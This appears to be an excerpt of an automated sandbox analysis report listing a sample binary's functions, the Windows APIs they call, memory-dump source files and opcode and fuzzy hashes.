                                                              • Part of subcall function 00501B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,004FBAE9,00000000,?,?,?,00010424), ref: 00501BA0
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004F2F91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                            • String ID: CMT
                                                            • API String ID: 1206968400-2756464174
                                                            • Opcode ID: de8bfab32068d155e45cf94a58e61fc829eac42980b91ba71029802ef45f39db
                                                            • Instruction ID: 256327d32f2d887a712ac87b8bdb03b649e5d52ec81bd7ef27d7e142a46c4a25
                                                            • Opcode Fuzzy Hash: de8bfab32068d155e45cf94a58e61fc829eac42980b91ba71029802ef45f39db
                                                            • Instruction Fuzzy Hash: 156207715002498FDB19DF34C9856FA3BA1BF54300F08457FEE9A8B382DBB9A945CB24
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0050F844
                                                            • IsDebuggerPresent.KERNEL32 ref: 0050F910
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0050F930
                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0050F93A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                            • String ID:
                                                            • API String ID: 254469556-0
                                                            • Opcode ID: 03b68008ac537ae22b04bd59874b156497f1d839c831f0b370779c1b04a38244
                                                            • Instruction ID: 6adc9a9b6c54c54835962c103677e8859f344ab9b4b7d7513e6eb1d268027e43
                                                            • Opcode Fuzzy Hash: 03b68008ac537ae22b04bd59874b156497f1d839c831f0b370779c1b04a38244
                                                            • Instruction Fuzzy Hash: 82312975D052199BDB20DFA4D9897CCBBB8BF08304F1040AAE40CAB290EB759B89DF45
                                                            APIs
                                                            • VirtualQuery.KERNEL32(80000000,0050E5E8,0000001C,0050E7DD,00000000,?,?,?,?,?,?,?,0050E5E8,00000004,00551CEC,0050E86D), ref: 0050E6B4
                                                            • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0050E5E8,00000004,00551CEC,0050E86D), ref: 0050E6CF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: InfoQuerySystemVirtual
                                                            • String ID: D
                                                            • API String ID: 401686933-2746444292
                                                            • Opcode ID: d62aa3717070b2a26775b02587f66de22e9827539271cc69db7d7edd240cd4c2
                                                            • Instruction ID: ef5c757bc29227d557f08d6e95b49c883a33472a253e198851daf5a154e15485
                                                            • Opcode Fuzzy Hash: d62aa3717070b2a26775b02587f66de22e9827539271cc69db7d7edd240cd4c2
                                                            • Instruction Fuzzy Hash: E401F732600109ABDB24DF29DC09BED7BAAFFC4324F1CC620ED19D7290D638D916C680
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00518FB5
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00518FBF
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00518FCC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: 3aac7e998f25bb3fd7b4bd41b0e02002b7d71b447e2a4478bd01ae91eed529c3
                                                            • Instruction ID: c5f25976186370cbb87d125a42fae70f08b8065f5e228cab784aa318d4629ce7
                                                            • Opcode Fuzzy Hash: 3aac7e998f25bb3fd7b4bd41b0e02002b7d71b447e2a4478bd01ae91eed529c3
                                                            • Instruction Fuzzy Hash: C931D675901219ABCB21DF24DC89BDCBBB8BF48310F5041EAE41CA7290EB709F858F45
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                            • Instruction ID: 66826c4ebad28b084e1d72f0f341a5ddfb29d4658d7df15affa81ec97648b52f
                                                            • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                            • Instruction Fuzzy Hash: 7B020B71E002199BEF14CFA9D9806EDBBF1FF88314F258269D919E7285D731AA41CB90
                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0050AF35
                                                            • GetNumberFormatW.KERNEL32(00000400,00000000,?,0052E72C,?,?), ref: 0050AF84
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: FormatInfoLocaleNumber
                                                            • String ID:
                                                            • API String ID: 2169056816-0
                                                            • Opcode ID: c0db03e1ebafaa2b0d09c8d96be4d5370b0be679003171fdc13922c316d8e126
                                                            • Instruction ID: 783c1412e8f13a6b08f8e0aa9fc9ae78e72fb889001d5da5fe8aad593bc633d3
                                                            • Opcode Fuzzy Hash: c0db03e1ebafaa2b0d09c8d96be4d5370b0be679003171fdc13922c316d8e126
                                                            • Instruction Fuzzy Hash: F601713A100349AAD720DF74EC49FDA7BBCFF1A714F005022FA0597190D3709929DBA5
                                                            APIs
                                                            • GetLastError.KERNEL32(004F6DDF,00000000,00000400), ref: 004F6C74
                                                            • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 004F6C95
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            • Opcode ID: 80675edc4e36dca245733ff42d6aa17f42b904b3cb0425b4416711490a753470
                                                            • Instruction ID: c148b9807a8df5ea8bff7d6dad26cd2afc97481d44bfb826c46765ba71f796bc
                                                            • Opcode Fuzzy Hash: 80675edc4e36dca245733ff42d6aa17f42b904b3cb0425b4416711490a753470
                                                            • Instruction Fuzzy Hash: 48D0C931344300BFFB210B618D0AF2B7B99BF56B51F19C445B795E80E0DA78942AB72E
                                                            APIs
                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,005219EF,?,?,00000008,?,?,0052168F,00000000), ref: 00521C21
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3997070919-0
                                                            • Opcode ID: 9ed735d3009c788032387d83a07ae73a03470e2e79bb9b48b570b6362c341a9e
                                                            • Instruction ID: 79e966065b4f54f9440018d65506a01024382f1f95b56e847339d2492340ce47
                                                            • Opcode Fuzzy Hash: 9ed735d3009c788032387d83a07ae73a03470e2e79bb9b48b570b6362c341a9e
                                                            • Instruction Fuzzy Hash: 86B14935210A189FD719CF28D48AB667FA0FF56364F258658E89ACF2E1C335ED81CB44
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0050F66A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: FeaturePresentProcessor
                                                            • String ID:
                                                            • API String ID: 2325560087-0
                                                            • Opcode ID: 85477fced2d564b30b3f85d9129fa633205ba5b2373f9380ce86bfec81801fbb
                                                            • Instruction ID: 4906548561abd251363d23ffef61ca89c57d6b48563f11a40202a0d017268e5e
                                                            • Opcode Fuzzy Hash: 85477fced2d564b30b3f85d9129fa633205ba5b2373f9380ce86bfec81801fbb
                                                            • Instruction Fuzzy Hash: 9A516DB19006198FEB24CF98E9967AEBBF4FB58314F24892AD411EB790D3749905CB50
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 004FB16B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Version
                                                            • String ID:
                                                            • API String ID: 1889659487-0
                                                            • Opcode ID: 8ee57f97e866ab6b9884ab3e3879da6d9f9f6bc3dc155a49fb474103a11c9044
                                                            • Instruction ID: 5e2463a6dfbd464e758da75f1656d7ed37a77e13a6ece4c3015b7806f433f31c
                                                            • Opcode Fuzzy Hash: 8ee57f97e866ab6b9884ab3e3879da6d9f9f6bc3dc155a49fb474103a11c9044
                                                            • Instruction Fuzzy Hash: EFF0B4B4E0060C8FDB28CB28ED9AAE533F5FB69304F100295D60593390C374AD89DFA5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gj
                                                            • API String ID: 0-4203073231
                                                            • Opcode ID: a7d3dfe9c0aaf8ebd7b86d99e63ab3fbd1586b6b1e00405cc60075bebcb6410c
                                                            • Instruction ID: 3439cc11b28fa149c8e148a9ceeb932814c10e13761175531c827bd0068f4f46
                                                            • Opcode Fuzzy Hash: a7d3dfe9c0aaf8ebd7b86d99e63ab3fbd1586b6b1e00405cc60075bebcb6410c
                                                            • Instruction Fuzzy Hash: C2C13776A183418FC354CF2AD88065BFBE1BFC9208F19892EE998D7311D734E945CB96
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0050F3A5), ref: 0050F9DA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 3626c36709def11f2a88b8bbb12c95a34df6b17df360a058a9979e44a483c631
                                                            • Instruction ID: 487119fdbce084e16ec837b47367b9f498de9752e5ca83fc181311a13e45aa4f
                                                            • Opcode Fuzzy Hash: 3626c36709def11f2a88b8bbb12c95a34df6b17df360a058a9979e44a483c631
                                                            • Instruction Fuzzy Hash:
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: HeapProcess
                                                            • String ID:
                                                            • API String ID: 54951025-0
                                                            • Opcode ID: 0eb9a9906d53882635ceba36d39d56001cb3b99459f576324de95e319b46de8e
                                                            • Instruction ID: 33d50757e8a556c007592f61656db3c5dd25a2299d9ac81fadf633245e5b2118
                                                            • Opcode Fuzzy Hash: 0eb9a9906d53882635ceba36d39d56001cb3b99459f576324de95e319b46de8e
                                                            • Instruction Fuzzy Hash: 33A011302022008BC3008F30AE8820A3BA8AA22282B08002AA008C0020EA2880A8BB00
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                            • Instruction ID: 8af08906bcdfb94bc8b6e7f0a22b74750b62d4f76980fcaa9ef5119cc5620bb8
                                                            • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                            • Instruction Fuzzy Hash: 6C62B1716047859FCB25CF28C8906BDBFE1BF95304F08896DE8AA8B386D734E955CB11
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                            • Instruction ID: 4418a86de34ee5292af17bd3eb2e57ba1e050a3a26428328a7683a2992e0efed
                                                            • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                            • Instruction Fuzzy Hash: E562D871A087498FCB15CF28C4909BDBFE1BF99304F18896DE89A8B386D730E945CB55
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                            • Instruction ID: a3695c6d9982a35a69f7bd3e43b5b78274cd615a6104a64a0f0564b92aa1703d
                                                            • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                            • Instruction Fuzzy Hash: 00524972A087018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA59CB86
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1289c2301875235396db0356645a1a6aea8092f05ca485c5207dc28a13b94fa4
                                                            • Instruction ID: 20ec512e4f7ee99d10d821188c1d8ae8c9bf6fa486e54b5aad6d10e3728f98f0
                                                            • Opcode Fuzzy Hash: 1289c2301875235396db0356645a1a6aea8092f05ca485c5207dc28a13b94fa4
                                                            • Instruction Fuzzy Hash: AC12B3B1A1870A9FC718CF28C8906BDBBE1FB98304F14492EE997C7681D374B595CB45
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bbe4c478338b74971b5d8ae4ab06da2d30e627bec3c59298aca4a582e33131aa
                                                            • Instruction ID: 7dd7ac8a2d49410e7e569829858995cff66910a6182fffecfcc4c9c6ea9c14cd
                                                            • Opcode Fuzzy Hash: bbe4c478338b74971b5d8ae4ab06da2d30e627bec3c59298aca4a582e33131aa
                                                            • Instruction Fuzzy Hash: 35F1AB71A083098FD718CF28C6C4A3ABBE1EFCA314F144A2EE685C7351D638D945CB4A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
